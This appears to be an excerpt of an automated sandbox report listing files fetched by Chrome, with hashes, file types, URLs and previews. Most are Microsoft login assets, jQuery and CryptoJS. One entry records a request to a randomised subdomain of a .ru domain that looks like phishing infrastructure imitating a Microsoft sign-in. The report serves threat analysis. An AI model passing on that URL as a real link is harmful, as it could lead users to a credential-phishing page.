                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                          Category:downloaded
                                                          Size (bytes):61052
                                                          Entropy (8bit):7.996159932827634
                                                          Encrypted:true
                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3452
                                                          Entropy (8bit):5.117912766689607
                                                          Encrypted:false
                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://login.live.com/Me.htm?v=3
                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):3.990210155325004
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                          Category:dropped
                                                          Size (bytes):61052
                                                          Entropy (8bit):7.996159932827634
                                                          Encrypted:true
                                                          SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                          Category:downloaded
                                                          Size (bytes):1435
                                                          Entropy (8bit):7.8613342322590265
                                                          Encrypted:false
                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                          Category:downloaded
                                                          Size (bytes):116345
                                                          Entropy (8bit):7.997378915283506
                                                          Encrypted:true
                                                          SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                          MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                          SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                          SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                          SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                          Category:dropped
                                                          Size (bytes):1435
                                                          Entropy (8bit):7.8613342322590265
                                                          Encrypted:false
                                                          SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                          MD5:9F368BC4580FED907775F31C6B26D6CF
                                                          SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                          SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                          SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                          Category:dropped
                                                          Size (bytes):116345
                                                          Entropy (8bit):7.997378915283506
                                                          Encrypted:true
                                                          SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                          MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                          SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                          SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                          SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:dropped
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3452
                                                          Entropy (8bit):5.117912766689607
                                                          Encrypted:false
                                                          SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://login.live.com/Me.htm?v=3
                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                          Category:downloaded
                                                          Size (bytes):16378
                                                          Entropy (8bit):7.986541062710992
                                                          Encrypted:false
                                                          SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                          MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                          SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                          SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                          SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                          Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):72
                                                          Entropy (8bit):4.241202481433726
                                                          Encrypted:false
                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 22 x 5, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.068159130770307
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPlr6t/e0psyxl/k4E08up:6v/lhP8tW0pB7Tp
                                                          MD5:C9C3511D219B9B0D0AC6514624004DB2
                                                          SHA1:400B8EEFEB1175AC011C6DCD075F857D2FE35FCA
                                                          SHA-256:7B65DCBD6796E0CBE9D75EE94042FE8D0733D0E7AB7C61D760FED3756C89501B
                                                          SHA-512:3D998B267962301B47D109ADF5C0F602CCA1EF4BA72B77E01E1C9C439BA68E615FA2A40B3D27F43C5D33E6D1CD0EF39BA12B12884BD8529EC8B061CA3B0FAF29
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.PNG........IHDR...............Y....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:very short file (no magic)
                                                          Category:downloaded
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://dbepc3rsodj1opbh9d5mekhhkvvbkxavf1ql6lcv9b7jldnqxtdykt.ivertoneym.ru/478252250458126598869NAvKmLJHHIDCBIGVWTZZDXTZQNQJWSQOLATPKBEJADGSYPAIIHZIFXUZZGMEARM
                                                          Preview:1
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                          Category:downloaded
                                                          Size (bytes):621
                                                          Entropy (8bit):7.673946009263606
                                                          Encrypted:false
                                                          SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                          MD5:4761405717E938D7E7400BB15715DB1E
                                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                          Malicious:false
